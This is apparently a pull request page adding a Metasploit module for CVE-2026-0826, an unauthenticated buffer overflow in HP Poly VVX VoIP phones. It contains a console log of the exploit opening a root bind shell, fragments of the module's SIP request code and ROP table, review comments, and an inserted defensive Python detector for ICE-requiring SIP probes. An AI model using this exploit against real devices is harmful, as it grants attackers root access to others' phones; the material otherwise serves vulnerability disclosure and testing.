
Exploit module for HP Poly VVX (CVE-2026-0826)#21525

Open
sfewer-r7 wants to merge 1 commit into rapid7:master from sfewer-r7:CVE-2026-0826

Conversation


@sfewer-r7 sfewer-r7 commented Jun 2, 2026

Overview

This pull request adds an exploit module for CVE-2026-0826, an unauthenticated stack-based buffer overflow affecting every model in the HP Poly VVX series, and the HP Poly Trio series of VoIP devices when they have the non-default ICE feature enabled. For more information on the vuln, see our Rapid7 disclosure blog or the vendor advisory.

The module currently supports a VVX 450 device with ROP gadgets for one recent version (6.4.7.4477), as that's what I have to test against.

The device is a minimal embedded Linux system, and getting a payload to work was a pain. I could only leverage socat based payloads, and specifically I added a new cmd/unix/bind_socat_tcp payload which is verified to work.

Example

msf exploit(linux/misc/poly_unauth_rce_cve_2026_0826) > check
[*] 192.168.86.80:5060 - The service is running, but could not be validated. Poly VVX_450 version 6.4.7.4477
msf exploit(linux/misc/poly_unauth_rce_cve_2026_0826) > exploit 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Poly VVX_450 version 6.4.7.4477
[*] Started bind TCP handler against 192.168.86.80:4444
[*] Command shell session 1 opened (192.168.86.122:33875 -> 192.168.86.80:4444) at 2026-06-02 11:59:28 +0100

id
uid=0(root) gid=0(root)
date
Tue Jun  2 11:59:30 UTC 2026
uname -a
Linux (none) 2.6.27.18 #1 PREEMPT Mon Jan 13 09:50:58 PST 2020 armv6l unknown
pwd
/ffs0
exit
[*] 192.168.86.80 - Command shell session 1 closed.

sip_request << "CSeq: #{rand(65_535)} OPTIONS\r\n"
sip_request << "Call-ID: #{Rex::Text.rand_text_hex(16)}\r\n"
# The vuln is in a non-default service for Interactive Connectivity Establishment (ICE). We use the Require header
# to ask the target is it supports ICE.
Suggested change
# to ask the target is it supports ICE.
# to ask the target if it supports ICE.
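The check discussed in this thread probes a phone with a SIP OPTIONS request whose Require header asks for ICE support. The same shape can be used on the defensive side: flag OPTIONS requests that require ICE and come from anything other than the call manager, since phones are not normally probed that way. The following is an added example written for this review, not code from the pull request or the module; it assumes the option tag is the RFC 5768 "ice" tag, that a hypothetical trusted-peer allowlist is known, and runs over constructed sample messages.

```python
"""Flag SIP OPTIONS probes that require ICE support from untrusted peers (added example)."""

# Hypothetical allowlist: hosts that legitimately send OPTIONS keep-alives to phones
# (call manager / SBC). Replace with the real addresses for your estate.
TRUSTED_SIP_PEERS = {"10.0.0.5"}


def parse_sip_message(raw: str):
    """Split a SIP request into (method, headers). Header names are lower-cased;
    repeated headers are kept as a list of values."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return method, headers


def option_tags(headers, name):
    """Collect comma-separated option tags (e.g. Require: ice, 100rel) as a lower-cased set."""
    tags = set()
    for value in headers.get(name, []):
        tags.update(t.strip().lower() for t in value.split(",") if t.strip())
    return tags


def flag_ice_probe(src_ip: str, raw: str):
    """Return a finding string for an OPTIONS request requiring 'ice' from an
    untrusted source, else None."""
    method, headers = parse_sip_message(raw)
    if method != "OPTIONS" or "ice" not in option_tags(headers, "require"):
        return None
    if src_ip in TRUSTED_SIP_PEERS:
        return None
    user_agent = headers.get("user-agent", ["<none>"])[0]
    return f"OPTIONS probe requiring ICE from untrusted {src_ip} (User-Agent: {user_agent})"


# Constructed sample messages (not captured traffic).
SAMPLE_PROBE = ("OPTIONS sip:192.168.86.80:5060 SIP/2.0\r\n"
                "Via: SIP/2.0/UDP 192.168.86.122:5060;branch=z9hG4bK-constructed\r\n"
                "From: <sip:probe@192.168.86.122>;tag=c0ffee\r\n"
                "To: <sip:192.168.86.80>\r\n"
                "CSeq: 4242 OPTIONS\r\n"
                "Call-ID: 0123456789abcdef\r\n"
                "Require: ice\r\n"
                "Content-Length: 0\r\n\r\n")
SAMPLE_KEEPALIVE = SAMPLE_PROBE.replace("Require: ice\r\n", "")
```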

def get_vvx_rop_table(version_str)
rop_tables = {
'6.4.7.4477' => {
# Even though /proc/sys/kernel/randomize_va_space is 1, all libraries are
Now I'm curious as to why ASLR doesn't work :D
